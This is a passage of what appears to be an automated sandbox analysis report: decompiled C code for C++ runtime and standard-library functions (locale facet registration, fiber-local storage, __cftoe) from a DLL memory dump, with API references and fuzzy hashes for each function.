										_push(0);
										_push(0);
										_push(0);
										L20:
										_t79 = E6E202188();
									} else {
										__eflags = _t79 - 0x22;
										if(_t79 == 0x22) {
											goto L19;
										}
									}
									__eflags = _t79;
									if(_t79 != 0) {
										goto L15;
									} else {
										goto L22;
									}
								}
							} else {
								L15:
							}
							return E6E1E09D6();
						} else {
							__eflags = _t67 - 0x22;
							if(_t67 == 0x22) {
								goto L13;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t70 = E6E20E486(__ebx, _t101, _a4, 0);
					L12:
					return _t70;
				}
			}

APIs

__cftoe.LIBCMT ref: 6E202409
__cftoe.LIBCMT ref: 6E20243B

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 1c3a89b206c49ca5bb38e97d757f2b2cfb40a09b76b3632947a7fcda9e7ee8c1
Instruction ID: a688100570c71f32e0c2eff8f943b1f216f983001335ed6e8de7adf0b9257da3
Opcode Fuzzy Hash: 1c3a89b206c49ca5bb38e97d757f2b2cfb40a09b76b3632947a7fcda9e7ee8c1
Instruction Fuzzy Hash: A751E6B790420EABDB548BE88C51E9E77BFEF49335F20461BE825A71C2EF30D5008664

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E42C8, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E1E42C8(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0x6e285090 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E6E1E56A9(__eflags,  *0x6e285090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6E1E56E4(__eflags,  *0x6e285090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_push(1);
								_t29 = E6E1EB9EA(_t16);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6E1E56E4(__eflags,  *0x6e285090, 0);
								} else {
									__eflags = E6E1E56E4(__eflags,  *0x6e285090, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L6E201DEB(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}

APIs

GetLastError.KERNEL32(00000001,?,6E1E3EDB,6E1DFA25,6E1DFD54,?,6E1DFF71,?,00000001,?,?,00000001,?,6E2827E0,0000000C,6E1E006E), ref: 6E1E42D6
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E1E42E4
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E1E42FD
SetLastError.KERNEL32(00000000,6E1DFF71,?,00000001,?,?,00000001,?,6E2827E0,0000000C,6E1E006E,?,00000001,?), ref: 6E1E434F

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e1449b813423597f6b39593e4236835ea180208c4d0f704c6fe03259e105fee1
Instruction ID: d19f6520302ee1a8ae0207dc4aec2bba82585987b76f4bca51f2f1a016bf2b13
Opcode Fuzzy Hash: e1449b813423597f6b39593e4236835ea180208c4d0f704c6fe03259e105fee1
Instruction Fuzzy Hash: FC01473221DF325FEB1406F56C99A8B26AAEB2737A330032AF02445CD4EF514886F190

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CFA97, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CFA97(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t198 - 0x14, 0);
				_t189 =  *0x6e286dfc;
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6E1A161C(0x6e286da8);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6E1C66BA(_t198 - 0x14);
					return E6E1E0075(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6E1D14EC(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t198 - 0x20);
							E6E1E3D74(_t198 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t184, _t189, 0x14);
							E6E1C6653(_t198 - 0x14, 0);
							_t190 =  *0x6e286dcc;
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6E1A161C(0x6e286d80);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6E1C66BA(_t198 - 0x14);
								return E6E1E0075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6E1D1558(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t198 - 0x20);
										E6E1E3D74(_t198 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t141, _t185, _t190, 0x14);
										E6E1C6653(_t198 - 0x14, 0);
										_t191 =  *0x6e286e00;
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6E1A161C(0x6e286dac);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6E1C66BA(_t198 - 0x14);
											return E6E1E0075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6E1D15C4(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t198 - 0x20);
													E6E1E3D74(_t198 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t141, _t186, _t191, 0x14);
													E6E1C6653(_t198 - 0x14, 0);
													_t192 =  *0x6e286dd0;
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6E1A161C(0x6e286d60);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6E1C66BA(_t198 - 0x14);
														return E6E1E0075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6E1D162A(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6E1A1438(_t169);
																E6E1E3D74(_t198 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e22851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6e22c0c4;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6E1D542F(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6E1E0075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6E1C6FD3(__eflags, _t187);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6e286dd0 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6E1C6FD3(__eflags, _t186);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6e286e00 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6E1C6FD3(__eflags, _t185);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6e286dcc = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6E1C6FD3(__eflags, _t184);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6e286dfc = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CFA9E
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFAA8
int.LIBCPMT ref: 6E1CFABF

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CFAF9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CFB19
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CFB37

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 8aa7cdefcf9dbf4e2a0c259cbc0da307b793a76f1b64c072d4d3f68602bd2bd3
Instruction ID: 91829220ffc1e08e35ba5f285afb285ddd2dc996c839ed5b6442c114aaa958a2
Opcode Fuzzy Hash: 8aa7cdefcf9dbf4e2a0c259cbc0da307b793a76f1b64c072d4d3f68602bd2bd3
Instruction Fuzzy Hash: 8711597591051D8FCF01DBE4C864AFEB37ABF64B04F244809E520EB290DF789985EB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CFB3D, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E1CFB3D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t154 - 0x14, 0);
				_t147 =  *0x6e286dcc;
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6E1A161C(0x6e286d80);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6E1A171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6E1C66BA(_t154 - 0x14);
					return E6E1E0075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6E1D1558(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t154 - 0x20);
							E6E1E3D74(_t154 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t143, _t147, 0x14);
							E6E1C6653(_t154 - 0x14, 0);
							_t148 =  *0x6e286e00;
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6E1A161C(0x6e286dac);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6E1A171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6E1C66BA(_t154 - 0x14);
								return E6E1E0075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6E1D15C4(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t154 - 0x20);
										E6E1E3D74(_t154 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t110, _t144, _t148, 0x14);
										E6E1C6653(_t154 - 0x14, 0);
										_t149 =  *0x6e286dd0;
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6E1A161C(0x6e286d60);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6E1A171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6E1C66BA(_t154 - 0x14);
											return E6E1E0075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6E1D162A(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6E1A1438(_t131);
													E6E1E3D74(_t154 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e22851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6e22c0c4;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6E1D542F(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6E1E0075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6E1C6FD3(__eflags, _t145);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6e286dd0 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6E1C6FD3(__eflags, _t144);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6e286e00 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6E1C6FD3(__eflags, _t143);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6e286dcc = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CFB44
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFB4E
int.LIBCPMT ref: 6E1CFB65

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CFB9F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CFBBF
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CFBDD

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 14c23545dff0c75d6518550c955f8fc7efd9e4616ba2c4ea6fbc6666d5ef8dc3
Instruction ID: e0153f20601bed145871338c3edc332bbf7e82680145aaf3d61d0579a3cefd28
Opcode Fuzzy Hash: 14c23545dff0c75d6518550c955f8fc7efd9e4616ba2c4ea6fbc6666d5ef8dc3
Instruction Fuzzy Hash: 52113AB591051D8BCF01DBD4C864BFEB77ABF64B14F240809D520E7290DF789989E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CFBE3, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6E1CFBE3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t110 - 0x14, 0);
				_t105 =  *0x6e286e00;
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6E1A161C(0x6e286dac);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6E1A171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6E1C66BA(_t110 - 0x14);
					return E6E1E0075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6E1D15C4(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t110 - 0x20);
							E6E1E3D74(_t110 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t102, _t105, 0x14);
							E6E1C6653(_t110 - 0x14, 0);
							_t106 =  *0x6e286dd0;
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6E1A161C(0x6e286d60);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6E1A171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6E1C66BA(_t110 - 0x14);
								return E6E1E0075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6E1D162A(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6E1A1438(_t93);
										E6E1E3D74(_t110 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e22851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6e22c0c4;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6E1D542F(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6E1E0075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6E1C6FD3(__eflags, _t103);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6e286dd0 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6E1C6FD3(__eflags, _t102);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6e286e00 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CFBEA
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFBF4
int.LIBCPMT ref: 6E1CFC0B

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CFC45
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CFC65
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CFC83

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: cead7f2baf0e4763f6b06387606104afd3766927f72d89fd7511ec336fbf0ee3
Instruction ID: ea8ba72e40ad753315814d1c042902e016b618bb883a27b568b52eea37567ffc
Opcode Fuzzy Hash: cead7f2baf0e4763f6b06387606104afd3766927f72d89fd7511ec336fbf0ee3
Instruction Fuzzy Hash: 8A113A759105188BCF01DBD4C854EFDB37ABF64B14F240908D420E7290CF789984E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB898, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1DB898(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				signed int _t98;
				void* _t110;
				void* _t123;
				void* _t136;
				void* _t149;
				void* _t162;
				signed int _t245;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t286;

				_t264 = __edx;
				_t203 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t286 - 0x14, 0);
				_t273 =  *0x6e286e30;
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				 *(_t286 - 0x10) = _t273;
				_t97 = E6E1A161C(0x6e286e10);
				_t206 =  *((intOrPtr*)(_t286 + 8));
				_t98 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t97);
				_t266 = _t98;
				if(_t98 != 0) {
					L5:
					E6E1C66BA(_t286 - 0x14);
					return E6E1E0075(_t266);
				} else {
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t286 + 8)));
						_push(_t286 - 0x10);
						__eflags = E6E1DC050(__ebx, _t206, __edx, _t266, _t273) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t286 - 0x20);
							E6E1E3D74(_t286 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t266, _t273, 0x14);
							E6E1C6653(_t286 - 0x14, 0);
							_t274 =  *0x6e286e34;
							 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
							 *(_t286 - 0x10) = _t274;
							_t110 = E6E1A161C(0x6e286e14);
							_t213 =  *((intOrPtr*)(_t286 + 8));
							_t267 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t110);
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E6E1C66BA(_t286 - 0x14);
								return E6E1E0075(_t267);
							} else {
								__eflags = _t274;
								if(_t274 == 0) {
									_push( *((intOrPtr*)(_t286 + 8)));
									_push(_t286 - 0x10);
									__eflags = E6E1DC0B8(_t203, _t213, __edx, _t267, _t274) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t286 - 0x20);
										E6E1E3D74(_t286 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t203, _t267, _t274, 0x14);
										E6E1C6653(_t286 - 0x14, 0);
										_t275 =  *0x6e286e3c;
										 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
										 *(_t286 - 0x10) = _t275;
										_t123 = E6E1A161C(0x6e286e1c);
										_t220 =  *((intOrPtr*)(_t286 + 8));
										_t268 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t123);
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E6E1C66BA(_t286 - 0x14);
											return E6E1E0075(_t268);
										} else {
											__eflags = _t275;
											if(_t275 == 0) {
												_push( *((intOrPtr*)(_t286 + 8)));
												_push(_t286 - 0x10);
												__eflags = E6E1DC120(_t203, _t220, __edx, _t268, _t275) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t286 - 0x20);
													E6E1E3D74(_t286 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t203, _t268, _t275, 0x14);
													E6E1C6653(_t286 - 0x14, 0);
													_t276 =  *0x6e286e38;
													 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
													 *(_t286 - 0x10) = _t276;
													_t136 = E6E1A161C(0x6e286e18);
													_t227 =  *((intOrPtr*)(_t286 + 8));
													_t269 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t136);
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E6E1C66BA(_t286 - 0x14);
														return E6E1E0075(_t269);
													} else {
														__eflags = _t276;
														if(_t276 == 0) {
															_push( *((intOrPtr*)(_t286 + 8)));
															_push(_t286 - 0x10);
															__eflags = E6E1DC1A4(_t203, _t227, _t264, _t269, _t276) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t286 - 0x20);
																E6E1E3D74(_t286 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t203, _t269, _t276, 0x14);
																E6E1C6653(_t286 - 0x14, 0);
																_t277 =  *0x6e286e40;
																 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																 *(_t286 - 0x10) = _t277;
																_t149 = E6E1A161C(0x6e286e20);
																_t234 =  *((intOrPtr*)(_t286 + 8));
																_t270 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t149);
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E6E1C66BA(_t286 - 0x14);
																	return E6E1E0075(_t270);
																} else {
																	__eflags = _t277;
																	if(_t277 == 0) {
																		_push( *((intOrPtr*)(_t286 + 8)));
																		_push(_t286 - 0x10);
																		__eflags = E6E1DC229(_t203, _t234, _t264, _t270, _t277) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t286 - 0x20);
																			E6E1E3D74(_t286 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t203, _t270, _t277, 0x14);
																			E6E1C6653(_t286 - 0x14, 0);
																			_t278 =  *0x6e286e44;
																			 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																			 *(_t286 - 0x10) = _t278;
																			_t162 = E6E1A161C(0x6e286e24);
																			_t241 =  *((intOrPtr*)(_t286 + 8));
																			_t271 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t162);
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E6E1C66BA(_t286 - 0x14);
																				return E6E1E0075(_t271);
																			} else {
																				__eflags = _t278;
																				if(_t278 == 0) {
																					_push( *((intOrPtr*)(_t286 + 8)));
																					_push(_t286 - 0x10);
